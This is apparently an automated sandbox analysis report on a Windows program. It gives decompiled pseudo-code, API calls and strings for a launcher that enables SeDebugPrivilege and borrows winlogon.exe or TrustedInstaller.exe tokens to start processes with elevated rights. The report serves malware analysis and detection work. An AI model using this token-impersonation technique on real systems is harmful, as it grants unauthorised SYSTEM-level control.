0x0040235e
0x0040236d
0x00402374
0x0040237e
0x00402395
0x004023a0
0x004023a0
0x004023ac
0x004023cf
0x004023d2
0x004023d9
0x004023de
0x004023f6
0x00402403
0x00402414
0x00402419
0x00402403
0x0040241a
0x00402423
0x00402458
0x0040245d
0x00402464
0x00402467
0x00402468
0x00000000
0x00000000
0x00000000
0x00402425
0x00402428
0x0040242b
0x00402433
0x00402434
0x00402473
0x00402473
0x0040247c
0x00402481
0x00402488
0x00402488
0x00402495
0x0040249a
0x004024b7
0x004024be
0x004024cd
0x004024d1
0x004024ed
0x004024f0
0x00402506
0x0040250b
0x00402512
0x00402518
0x00402519
0x0040251e
0x00402524
0x00402527
0x0040252b
0x00402530
0x00402531
0x00402531
0x0040253d
0x0040255a
0x00402561
0x00402570
0x00402574
0x00402590
0x00402593
0x004025a9
0x004025ae
0x004025b5
0x004025bb
0x004025bc
0x004025c1
0x004025c7
0x004025ca
0x004025cd
0x004025ce
0x004025d4
0x004025d4
0x004025da
0x004025e3
0x004025eb
0x00402633
0x004025fb
0x00402608
0x0040260f
0x00402614
0x00402624
0x00402630
0x00402630
0x0040263a
0x0040263b
0x00402646
0x0040264b
0x0040264c
0x0040265a
0x0040265a
0x0040265d
0x00402666
0x00402668
0x00402668
0x00402672
0x00402675
0x0040267e
0x0040267e
0x00402683
0x0040268b
0x0040269e
0x0040269e
0x004026a3
0x004026ac
0x004026b5
0x004026b8
0x00000000
0x00000000
0x004026ba
0x00000000
0x004026ae
0x004026ae
0x004026bf
0x004026c1
0x004026c6
0x004026cc
0x004026d5
0x004026db
0x004026e4
0x004026ea
0x004026f3
0x004026f9
0x00402707
0x00402707
0x0040270d
0x00402710
0x0040276d
0x00402770
0x0040280b
0x0040280e
0x00402813
0x00402810
0x00402810
0x00402810
0x00402819
0x0040281f
0x00402836
0x00402841
0x00402846
0x0040284a
0x00402851
0x00402857
0x00402860
0x00402865
0x00402876
0x00402879
0x00402888
0x00402888
0x00402857
0x00402891
0x0040289c
0x0040289c
0x00402779
0x00402784
0x0040278d
0x004027a4
0x004027b3
0x004027b8
0x004027bb
0x004027bf
0x004027c6
0x004027c6
0x004027d1
0x004027d6
0x004027d9
0x004027db
0x004027e2
0x004027e4
0x004027e4
0x004027e7
0x004027f4
0x004027fc
0x00402801
0x00402801
0x00402803
0x00402803
0x00402806
0x00000000
0x00402806
0x00402715
0x00402729
0x0040272e
0x00402731
0x00402738
0x00402738
0x00402743
0x00402748
0x0040274d
0x00402754
0x00402756
0x00402756
0x00402759
0x00402763
0x00000000
0x00402763
0x004026fb
0x00402700
0x00402702
0x00000000
0x00402702
0x004026ec
0x00000000
0x004026ec
0x004026dd
0x00000000
0x004026dd
0x004026ce
0x00000000
0x004026ce
0x004026ac
0x00402443
0x0040246a
0x00402470
0x00000000
0x00402470

APIs

memset.MSVCRT ref: 00402300
memset.MSVCRT ref: 0040233E
memset.MSVCRT ref: 00402356

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

wcschr.MSVCRT ref: 00402387
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0

Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69

wcschr.MSVCRT ref: 004023B7
memset.MSVCRT ref: 004023D9
SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
wcschr.MSVCRT ref: 0040242B
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
memset.MSVCRT ref: 004024BE
memset.MSVCRT ref: 004024D1
_wtoi.MSVCRT ref: 00402519
_wtoi.MSVCRT ref: 0040252B
memset.MSVCRT ref: 00402561
memset.MSVCRT ref: 00402574
_wtoi.MSVCRT ref: 004025BC
_wtoi.MSVCRT ref: 004025CE
wcschr.MSVCRT ref: 004025F0
memset.MSVCRT ref: 0040260F
ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
_snwprintf.MSVCRT ref: 0040264C
SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888

Strings

DISABLEDWM, xrefs: 004026EC
DISABLETHEMES, xrefs: 004026DD
D, xrefs: 00402374
"%s" %s, xrefs: 0040263B
HIGHDPIAWARE, xrefs: 004026FB
__COMPAT_LAYER, xrefs: 00402814
RunAsInvoker, xrefs: 00402677
256COLOR, xrefs: 004026AE
640X480, xrefs: 004026CE
16BITCOLOR, xrefs: 004026BA

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
API String ID: 2452314994-435178042
Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}

0x00408533
0x00408533
0x00408536
0x0040853e
0x00408546
0x0040854d
0x00408559
0x00408563
0x00408569
0x00408572
0x00408583
0x0040858d
0x00408595
0x0040859e
0x004085a2
0x004085a6
0x004085aa
0x004085ae
0x004085b8
0x004085c1
0x004085c8
0x004085cd
0x004085cf
0x0040867f
0x00408688
0x0040868d
0x0040868f
0x00408730
0x00408735
0x00408737
0x0040873d
0x00408750
0x0040875d
0x00408763
0x00408770
0x00408775
0x00408779
0x0040878b
0x00408790
0x004087a2
0x004087aa
0x004087b8
0x004087be
0x004087c3
0x004087c9
0x004087d2
0x004087df
0x004087e3
0x004087e6
0x00408801
0x004087e8
0x004087f8
0x004087fe
0x00408811
0x00408816
0x00408816
0x0040881c
0x00408822
0x00408779
0x00408824
0x00408829
0x00408833
0x00408834
0x00408840
0x00408848
0x0040884c
0x00408850
0x00408855
0x0040885a
0x00408860
0x004088ac
0x004088b1
0x004088b3
0x004088bf
0x004088c5
0x004088cb
0x004088da
0x004088ea
0x004088ed
0x004088f8
0x004088ff
0x00408905
0x004088b5
0x004088b5
0x004088b5
0x00000000
0x00408862
0x00408862
0x0040886d
0x00408874
0x0040887b
0x00408882
0x00408889
0x00408895
0x00408897
0x00408658
0x00408658
0x0040865d
0x00408661
0x0040866a
0x00408673
0x00408678
0x00000000
0x00408678
0x00408860
0x00408695
0x00408695
0x0040869f
0x004086a2
0x004086af
0x004086a4
0x004086a7
0x004086a7
0x004086b4
0x004086bf
0x004086cb
0x004086d3
0x004086d7
0x004086db
0x004086e0
0x004086f1
0x004086f8
0x004086ff
0x00408706
0x0040870d
0x00408719
0x0040871b
0x00000000
0x0040871b
0x004085d5
0x004085da
0x00000000
0x00000000
0x004085ec
0x004085ef
0x004085f6
0x004085fd
0x00408604
0x0040860b
0x00408612
0x00408616
0x00408620
0x0040862a
0x00408632
0x00408633
0x00408638
0x0040864f
0x00408651
0x00000000
0x0040854f
0x0040854f
0x00408550
0x00408556
0x00408556

APIs

Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD

SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 00408583
swscanf.MSVCRT ref: 00408620
_wtoi.MSVCRT ref: 00408633

Strings

/Run, xrefs: 0040867F
/cfg, xrefs: 00408727
XA, xrefs: 004088E5
, xrefs: 00408595
SeDebugPrivilege, xrefs: 004085B3
/savelangfile, xrefs: 004088A3
%I64x, xrefs: 004085E7
`oA, xrefs: 004088D0

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
API String ID: 3933224404-3784219877
Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243
processCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}

0x00401fe6
0x00401ff1
0x00401ff3
0x00401fff
0x00402002
0x004020a8
0x004020ab
0x004020f3
0x004020f6
0x00402162
0x00402165
0x004021f2
0x004021f5
0x00402235
0x00402238
0x004022be
0x0040223a
0x0040223a
0x00402240
0x0040224b
0x0040224e
0x00402251
0x00402254
0x00402259
0x0040225e
0x00402262
0x00402264
0x00402264
0x00402264
0x00402262
0x00402266
0x0040226c
0x00402271
0x00402274
0x00402276
0x0040229a
0x0040229a
0x00402278
0x00402296
0x00402296
0x0040229c
0x0040229c
0x004022c0
0x004022c2
0x004022c8
0x004022c8
0x004022c8
0x00000000
0x004022c0
0x00402201
0x00402203
0x00000000
0x00000000
0x00402220
0x00402225
0x00402227
0x00000000
0x00000000
0x0040222d
0x00000000
0x0040222d
0x00402173
0x00402179
0x0040217b
0x0040217e
0x00402183
0x00402185
0x00402188
0x0040218d
0x0040218f
0x00402192
0x004021a2
0x004021a7
0x004021a9
0x004021ac
0x004021cc
0x004021d1
0x004021d3
0x004021db
0x004021db
0x004021e1
0x004021e1
0x004021e7
0x004021e7
0x00000000
0x00402192
0x004020fe
0x00402103
0x00402105
0x00000000
0x00000000
0x00402111
0x00402114
0x00000000
0x00402114
0x004020ad
0x004020b4
0x004020b9
0x004020bc
0x00000000
0x004020c2
0x004020c4
0x004020ce
0x004020d0
0x004020d3
0x004020d4
0x004020d5
0x004020e6
0x004020e7
0x004020d7
0x004020d7
0x004020dd
0x004020de
0x004020df
0x004020df
0x004020ec
0x004020ef
0x00000000
0x004020ef
0x00402008
0x00402016
0x0040201d
0x0040202e
0x00402035
0x00402044
0x00402049
0x00402055
0x00402064
0x00402068
0x0040206e
0x0040208b
0x00402070
0x00402082
0x00402088
0x0040209e
0x004020a1
0x00402119
0x00402119
0x0040211b
0x0040211e
0x0040211e
0x00402149
0x00402151
0x00402151
0x00402157
0x00402157
0x004022cb
0x004022d2
0x004022d2

APIs

memset.MSVCRT ref: 0040201D
memset.MSVCRT ref: 00402035

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

wcslen.MSVCRT ref: 00402050
wcslen.MSVCRT ref: 0040205F
wcslen.MSVCRT ref: 004020B4
_wtoi.MSVCRT ref: 004020D7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7

Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB

Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61

Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB

wcschr.MSVCRT ref: 00402259
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004022B8
GetLastError.KERNEL32(?,?,00000000), ref: 004022C2

Strings

ServicesActive, xrefs: 0040216D
TrustedInstaller.exe, xrefs: 0040219C
winlogon.exe, xrefs: 00402049, 00402076

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
API String ID: 3201562063-2355939583
Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59

Uniqueness

Uniqueness Score: -1.00%

Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}

0x00409924
0x0040992c
0x00409937
0x0040993f
0x0040994a
0x00409956
0x00409962
0x0040996e
0x00409971
0x00409973
0x00000000
0x00409976
0x00409977

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971

Strings

GetModuleFileNameExW, xrefs: 0040994F
psapi.dll, xrefs: 00409927
EnumProcessModules, xrefs: 00409943
GetModuleInformation, xrefs: 00409967
GetModuleBaseNameW, xrefs: 00409937
EnumProcesses, xrefs: 0040995B

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$memsetwcscat
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 1529661771-70141382
